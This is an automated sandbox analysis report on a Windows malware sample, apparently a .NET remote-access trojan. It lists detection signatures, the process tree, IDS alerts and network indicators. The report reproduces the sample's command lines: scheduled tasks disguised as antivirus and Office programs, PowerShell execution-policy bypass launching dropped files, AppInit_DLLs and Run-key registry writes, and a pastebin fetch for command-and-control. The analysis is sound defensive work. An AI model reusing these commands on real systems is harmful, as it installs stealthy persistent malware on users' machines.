Windows Analysis Report
ptKNiAaGus.exe

Overview

General Information

Sample name: ptKNiAaGus.exe
Analysis ID: 1466956
MD5: 4410af8bec1266d76029f9bb042c6a73
SHA1: 632a7eadf55f09d8ba0d9641ae1adaa921aaf5fa
SHA256: 04783068a4bc4ce6a3f2e8ed35d40528b84ddb9c1a0ad2f39fb5634eb5f8295a

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
Allows loading of unsigned dll using appinit_dll
Bypasses PowerShell execution policy
Connects to a pastebin service (likely for C&C)
Creates an undocumented autostart registry key
Creates multiple autostart registry keys
Drops PE files to the user root directory
Drops large PE files
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries memory information (via WMI often done to detect virtual machines)
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: Suspicious Script Execution From Temp Folder
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses schtasks.exe or at.exe to add and modify task schedules
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: CurrentVersion NT Autorun Keys Modification
Sigma detected: Suspicious Schtasks From Env Var Folder
Stores large binary data to the registry
Too many similar processes found
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection

Classification

  • System is w10x64native
  • ptKNiAaGus.exe (PID: 8868 cmdline: "C:\Users\user\Desktop\ptKNiAaGus.exe" MD5: 4410AF8BEC1266D76029F9BB042C6A73)
    • WmiPrvSE.exe (PID: 6552 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • cmd.exe (PID: 1332 cmdline: "CMD" /C SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "Avast Antivirus" /tr "C:\Users\user\xdwdPutty.exe" & exit MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7300 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • schtasks.exe (PID: 7408 cmdline: SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "Avast Antivirus" /tr "C:\Users\user\xdwdPutty.exe" MD5: 796B784E98008854C27F4B18D287BA30)
    • cmd.exe (PID: 9572 cmdline: "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST & exit MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 9580 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
        • Conhost.exe (PID: 9628 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • schtasks.exe (PID: 9636 cmdline: SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST MD5: 796B784E98008854C27F4B18D287BA30)
    • cmd.exe (PID: 9648 cmdline: "CMD" /c SchTaSKs /create /f /sc minute /mo 5 /tn "Google Drive" /tr "C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe" /RL HIGHEST & exit MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 9676 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • schtasks.exe (PID: 9760 cmdline: SchTaSKs /create /f /sc minute /mo 5 /tn "Google Drive" /tr "C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe" /RL HIGHEST MD5: 796B784E98008854C27F4B18D287BA30)
    • cmd.exe (PID: 9668 cmdline: "C:\Windows\System32\cmd.exe" /c start /b powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe"' & exit MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 9684 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • powershell.exe (PID: 9776 cmdline: powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe"' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • pto2q1ow.nf5.exe (PID: 10036 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe" MD5: D843D2F7E8D6DD8B1490C0EABA86F5CC)
          • cmd.exe (PID: 10220 cmdline: "CMD" /C SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "OpenOffice" /tr "C:\Users\user\Videos\xdwdMicrosoft PowerPoint Host.exe" & exit MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 10232 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
            • schtasks.exe (PID: 6988 cmdline: SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "OpenOffice" /tr "C:\Users\user\Videos\xdwdMicrosoft PowerPoint Host.exe" MD5: 796B784E98008854C27F4B18D287BA30)
          • xdwdPutty.exe (PID: 10220 cmdline: C:\Users\user\xdwdPutty.exe MD5: 8BBEF39EBACCBCCEF26BE354545B98BD)
            • cmd.exe (PID: 7740 cmdline: "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST & exit MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 7752 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
          • cmd.exe (PID: 1536 cmdline: "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Azure DevOps" /tr "C:\Users\user\Videos\xdwdMicrosoft PowerPoint Host.exe" /RL HIGHEST & exit MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 608 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
          • cmd.exe (PID: 6740 cmdline: "CMD" /c SchTaSKs /create /f /sc minute /mo 5 /tn "Corel PaintShop Pro" /tr "C:\Users\user\Videos\xdwdPutty.exe" /RL HIGHEST & exit MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 2624 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
              • Conhost.exe (PID: 4960 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
          • Conhost.exe (PID: 9228 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
            • Conhost.exe (PID: 9764 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
          • Conhost.exe (PID: 5320 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 1908 cmdline: "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST & exit MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 712 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • schtasks.exe (PID: 7712 cmdline: SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST MD5: 796B784E98008854C27F4B18D287BA30)
    • cmd.exe (PID: 8164 cmdline: "C:\Windows\System32\cmd.exe" /c start /b powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe"' & exit MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7080 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • powershell.exe (PID: 5076 cmdline: powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe"' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • z4wwumki.3zg.exe (PID: 6424 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe" MD5: D843D2F7E8D6DD8B1490C0EABA86F5CC)
          • cmd.exe (PID: 6236 cmdline: "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Azure DevOps" /tr "C:\Users\user\Videos\xdwdMicrosoft PowerPoint Host.exe" /RL HIGHEST & exit MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 5872 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
            • schtasks.exe (PID: 8120 cmdline: SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Azure DevOps" /tr "C:\Users\user\Videos\xdwdMicrosoft PowerPoint Host.exe" /RL HIGHEST MD5: 796B784E98008854C27F4B18D287BA30)
          • Conhost.exe (PID: 2892 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 7780 cmdline: "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST & exit MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 4908 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • schtasks.exe (PID: 4676 cmdline: SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST MD5: 796B784E98008854C27F4B18D287BA30)
    • cmd.exe (PID: 6512 cmdline: "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST & exit MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 5320 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
        • Conhost.exe (PID: 1968 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • schtasks.exe (PID: 2780 cmdline: SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST MD5: 796B784E98008854C27F4B18D287BA30)
    • cmd.exe (PID: 8304 cmdline: "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST & exit MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 8324 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • schtasks.exe (PID: 8416 cmdline: SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST MD5: 796B784E98008854C27F4B18D287BA30)
    • cmd.exe (PID: 8752 cmdline: "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST & exit MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 8820 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • schtasks.exe (PID: 8960 cmdline: SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST MD5: 796B784E98008854C27F4B18D287BA30)
    • cmd.exe (PID: 8496 cmdline: "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST & exit MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 8556 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • schtasks.exe (PID: 9636 cmdline: SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST MD5: 796B784E98008854C27F4B18D287BA30)
        • Conhost.exe (PID: 9656 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 9684 cmdline: "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST & exit MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 9132 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • schtasks.exe (PID: 9956 cmdline: SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST MD5: 796B784E98008854C27F4B18D287BA30)
    • cmd.exe (PID: 7224 cmdline: "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST & exit MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7948 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • schtasks.exe (PID: 7460 cmdline: SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST MD5: 796B784E98008854C27F4B18D287BA30)
    • Conhost.exe (PID: 8304 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • xdwdMicrosoft Paint.exe (PID: 9912 cmdline: "C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe" MD5: A4A43E58C3E256B89E9074B3485947F4)
    • cmd.exe (PID: 1076 cmdline: "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST & exit MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 2060 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • schtasks.exe (PID: 4240 cmdline: SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST MD5: 796B784E98008854C27F4B18D287BA30)
    • xdwdPutty.exe (PID: 2812 cmdline: "C:\Users\user\xdwdPutty.exe" MD5: 8BBEF39EBACCBCCEF26BE354545B98BD)
      • cmd.exe (PID: 2420 cmdline: "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST & exit MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 4528 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
        • schtasks.exe (PID: 3216 cmdline: SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST MD5: 796B784E98008854C27F4B18D287BA30)
          • Conhost.exe (PID: 7776 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
            • Conhost.exe (PID: 9972 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • xdwdMicrosoft Paint.exe (PID: 8500 cmdline: "C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe" MD5: A4A43E58C3E256B89E9074B3485947F4)
    • cmd.exe (PID: 8636 cmdline: "CMD" /c scHTaSks /Run /I /TN "Avast Antivirus" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 8620 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • schtasks.exe (PID: 8784 cmdline: scHTaSks /Run /I /TN "Avast Antivirus" MD5: 796B784E98008854C27F4B18D287BA30)
  • xdwdPutty.exe (PID: 8872 cmdline: C:\Users\user\xdwdPutty.exe MD5: 8BBEF39EBACCBCCEF26BE354545B98BD)
    • cmd.exe (PID: 9116 cmdline: "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST & exit MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 9184 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • schtasks.exe (PID: 5876 cmdline: SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST MD5: 796B784E98008854C27F4B18D287BA30)
      • Conhost.exe (PID: 9180 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • xdwdMicrosoft Paint.exe (PID: 9720 cmdline: "C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe" MD5: A4A43E58C3E256B89E9074B3485947F4)
    • cmd.exe (PID: 9268 cmdline: "CMD" /c scHTaSks /Run /I /TN "Avast Antivirus" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7712 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • schtasks.exe (PID: 9424 cmdline: scHTaSks /Run /I /TN "Avast Antivirus" MD5: 796B784E98008854C27F4B18D287BA30)
  • cleanup
No configs have been found
No yara matches

System Summary

Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: "CMD" /C SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "Avast Antivirus" /tr "C:\Users\user\xdwdPutty.exe" & exit, CommandLine: "CMD" /C SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "Avast Antivirus" /tr "C:\Users\user\xdwdPutty.exe" & exit, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\ptKNiAaGus.exe", ParentImage: C:\Users\user\Desktop\ptKNiAaGus.exe, ParentProcessId: 8868, ParentProcessName: ptKNiAaGus.exe, ProcessCommandLine: "CMD" /C SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "Avast Antivirus" /tr "C:\Users\user\xdwdPutty.exe" & exit, ProcessId: 1332, ProcessName: cmd.exe
Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe"' , CommandLine: powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe"' , CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c start /b powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe"' & exit, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 9668, ParentProcessName: cmd.exe, ProcessCommandLine: powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe"' , ProcessId: 9776, ProcessName: powershell.exe
Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\ptKNiAaGus.exe, ProcessId: 8868, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\xdwdsystegregre
Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Windows\xdwd.dll, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\ptKNiAaGus.exe, ProcessId: 8868, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_DLLs
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: SchTaSKs /create /f /sc minute /mo 5 /tn "Google Drive" /tr "C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe" /RL HIGHEST , CommandLine: SchTaSKs /create /f /sc minute /mo 5 /tn "Google Drive" /tr "C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe" /RL HIGHEST , CommandLine|base64offset|contains: ISi", Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "CMD" /c SchTaSKs /create /f /sc minute /mo 5 /tn "Google Drive" /tr "C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe" /RL HIGHEST & exit, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 9648, ParentProcessName: cmd.exe, ProcessCommandLine: SchTaSKs /create /f /sc minute /mo 5 /tn "Google Drive" /tr "C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe" /RL HIGHEST , ProcessId: 9760, ProcessName: schtasks.exe
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe"' , CommandLine: powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe"' , CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c start /b powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe"' & exit, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 9668, ParentProcessName: cmd.exe, ProcessCommandLine: powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe"' , ProcessId: 9776, ProcessName: powershell.exe
Timestamp:07/03/24-15:50:29.602801
SID:2851746
Source Port:49740
Destination Port:44998
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:07/03/24-15:50:31.680170
SID:2851746
Source Port:49741
Destination Port:44998
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:07/03/24-15:50:36.268137
SID:2851746
Source Port:49745
Destination Port:44998
Protocol:TCP
Classtype:A Network Trojan was detected

AV Detection

Source: C:\Users\user\Videos\xdwdMicrosoft PowerPoint Host.exe, Avira: detection malicious, Label: TR/Crypt.OPACK.Gen
Source: C:\Users\user\xdwdPutty.exe, Avira: detection malicious, Label: TR/Crypt.OPACK.Gen
Source: ptKNiAaGus.exe, ReversingLabs: Detection: 83%
Source: C:\Users\user\Videos\xdwdPutty.exe, Joe Sandbox ML: detected
Source: ptKNiAaGus.exe, Joe Sandbox ML: detected
Source: unknown, HTTPS traffic detected: 104.20.3.235:443 -> 192.168.11.20:49734 version: TLS 1.0
Source: unknown, HTTPS traffic detected: 104.20.3.235:443 -> 192.168.11.20:49742 version: TLS 1.0
Source: ptKNiAaGus.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: C:\Users\Malware\Desktop\hack tool\Backdoor\Sheet rat v 2.2\Src\Plugins\SendFile\obj\Release\SendFile.pdb source: ptKNiAaGus.exe, 00000000.00000002.3335122785.000000001BAD0000.00000004.08000000.00040000.00000000.sdmp
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe, File opened: C:\Users\user
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe, File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe, File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe, File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe, File opened: C:\Users\user\AppData
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe, File opened: C:\Users\user\AppData\Roaming

Networking

Source: Traffic, Snort IDS: 2851746 ETPRO TROJAN MSIL/TrojanDownloader.Small.CUV Variant Checkin 192.168.11.20:49740 -> 147.185.221.18:44998
Source: Traffic, Snort IDS: 2851746 ETPRO TROJAN MSIL/TrojanDownloader.Small.CUV Variant Checkin 192.168.11.20:49741 -> 147.185.221.18:44998
Source: Traffic, Snort IDS: 2851746 ETPRO TROJAN MSIL/TrojanDownloader.Small.CUV Variant Checkin 192.168.11.20:49745 -> 147.185.221.18:44998
Source: unknown, DNS query: name: pastebin.com
Source: global traffic, TCP traffic: 192.168.11.20:49735 -> 147.185.221.18:44998
Source: global traffic, HTTP traffic detected: GET /raw/LmbvnzZM HTTP/1.1 Host: pastebin.com Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: GET / HTTP/1.1 Host: icanhazip.com Connection: Keep-Alive
Source: Joe Sandbox View, IP Address: 104.20.3.235
Source: Joe Sandbox View, IP Address: 104.16.185.241
Source: Joe Sandbox View, IP Address: 147.185.221.18
Source: Joe Sandbox View, ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View, ASN Name: SALSGIVERUS
Source: Joe Sandbox View, JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: unknown, DNS query: name: icanhazip.com
Source: unknown, HTTPS traffic detected: 104.20.3.235:443 -> 192.168.11.20:49734 version: TLS 1.0
Source: unknown, HTTPS traffic detected: 104.20.3.235:443 -> 192.168.11.20:49742 version: TLS 1.0
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic, DNS traffic detected: DNS query: pastebin.com
